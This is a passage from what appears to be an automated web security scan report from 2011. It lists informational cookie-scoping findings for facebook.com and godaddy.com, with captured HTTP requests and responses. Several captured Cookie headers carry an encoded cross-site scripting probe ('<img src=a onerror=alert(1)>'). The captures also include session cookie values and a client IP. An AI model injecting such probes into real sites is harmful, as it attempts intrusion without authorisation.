The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.facebook.com/h02332
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=T19_s
Content-Type: application/x-www-form-urlencoded
Content-Length: 779

post_form_id=76bac92d00ddc3f918cce3ae87a1177e&lsd=T19_s&captcha_persist_data=AQBeontrT_F0tu7Ahqufh0Nz_L57GC3z01jTVMayUpXS3RtmLp7gUAIWBcPgu66CfwG3bDSmtoZxxdfxY8Wj0BFJoRTL5R9qmmmGtfS7XvxLkrDktAk6_X9BzWt
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.185.122
X-Cnection: close
Date: Thu, 05 May 2011 12:38:10 GMT
Content-Length: 40951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.102. https://www.facebook.com/h02332  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /h02332

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h02332 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FAlexander-Bucky-Jordan%2F1242845259; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.27
X-Cnection: close
Date: Thu, 05 May 2011 12:37:05 GMT
Content-Length: 14497

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.103. https://www.facebook.com/help/contact.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /help/contact.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/contact.php?show_form=cannot_identify&flow=pw_reset HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: https://www.facebook.com/recover.php?locale=en_US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fterms.php%3Fref%3Dpf; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.113
X-Cnection: close
Date: Thu, 05 May 2011 11:44:19 GMT
Content-Length: 23828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.104. https://www.facebook.com/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /login.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; expires=Sat, 04-May-2013 10:56:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.31.128
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 16087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.105. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /pages/ToP-SeCNeT/195242630519520

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • lsd=Mkkns; path=/; domain=.facebook.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=Mkkns; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.66.104
X-Cnection: close
Date: Thu, 05 May 2011 02:09:53 GMT
Content-Length: 46999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.106. https://www.facebook.com/pages/create.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /pages/create.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/create.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.33.22.122
Connection: close
Date: Thu, 05 May 2011 10:56:57 GMT
Content-Length: 32123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.107. https://www.facebook.com/r.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /r.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.226.129
Connection: close
Date: Thu, 05 May 2011 10:56:58 GMT
Content-Length: 29546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.108. https://www.facebook.com/recover.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /recover.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
  • made_write_conn=1304595854; path=/; domain=.facebook.com
  • reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
  • W=1304595854; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /recover.php?locale=en_US HTTP/1.1
Host: www.facebook.com
Connection: keep-alive
Referer: http://www.facebook.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fpage%3D432; act=1304613672018%2F1; _e_nXwy_0=%5B%22nXwy%22%2C1304613672031%2C%22act%22%2C1304613672018%2C1%2C%22http%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US%22%2C%22a%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2Flogin.php%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C482%2C422%2C0%2C1006%2C16%5D; wd=1022x1007

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: _e_nXwy_0=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: L=2; path=/; domain=.facebook.com; httponly
Set-Cookie: made_write_conn=1304595854; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Frecover.php%3Flocale%3Den_US; path=/; domain=.facebook.com
Set-Cookie: W=1304595854; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.189.132
X-Cnection: close
Date: Thu, 05 May 2011 11:44:14 GMT
Content-Length: 18743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.109. https://www.godaddy.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
  • currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
  • currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
  • traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
Set-Cookie: SplitValue1=60; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:18 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
Set-Cookie: HPBackground=DanicaImageOne; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:18 GMT
Connection: close
Content-Length: 267405


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

10.110. https://www.godaddy.com/domains/search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /domains/search.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
  • currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
  • currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
  • traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
  • BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=eaduka553tx3nvvrjumr4n23; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: adc1=US; domain=godaddy.com; path=/
Set-Cookie: flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
Set-Cookie: currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
Set-Cookie: SplitValue1=47; domain=godaddy.com; expires=Fri, 06-May-2011 10:57:20 GMT; path=/
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
Set-Cookie: BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 204705


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><li
...[SNIP]...

10.111. https://www.godaddy.com/gdshop/hosting/landing.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/hosting/landing.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:
  • currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
  • traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gdshop/hosting/landing.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 237966
Content-Type: text/html
Expires: Thu, 28 Apr 2011 12:17:23 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: traffic=referringdomain=&referringpath=&shopper=&querystring=&server=M1PWCORPWEB174&isc=&privatelabelid=1&page=%2Fgdshop%2Fhosting%2Flanding%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=173%2E193%2E214%2E243&status=200+OK&referrer=&cookies=1; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=DJIOEHOABCHFDNEFOEEOKGOF; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:22 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html>
<head>
<title>Web Hosting</title>
<meta http-equiv="Content-Type" con
...[SNIP]...

10.112. https://www.godaddy.com/gdshop/registrar/search.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/registrar/search.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/registrar/search.asp HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Content-Type: text/html; Charset=utf-8
Expires: Thu, 28 Apr 2011 12:17:24 GMT
Location: https://www.godaddy.com/domains/search.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: currency1=potableSourceStr=USD; expires=Fri, 04-May-2012 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: adc1=US; expires=Thu, 12-May-2011 07:00:00 GMT; domain=.godaddy.com; path=/
Set-Cookie: serverVersion=A; domain=.godaddy.com; path=/
Set-Cookie: domainYardVal=%2D1; domain=.godaddy.com; path=/
Set-Cookie: ASPSESSIONIDQETSARRC=FJIOEHOAAMMALPNOAONKBPHB; secure; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:23 GMT
Connection: close


10.113. https://www.godaddy.com/gdshop/website.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /gdshop/website.asp

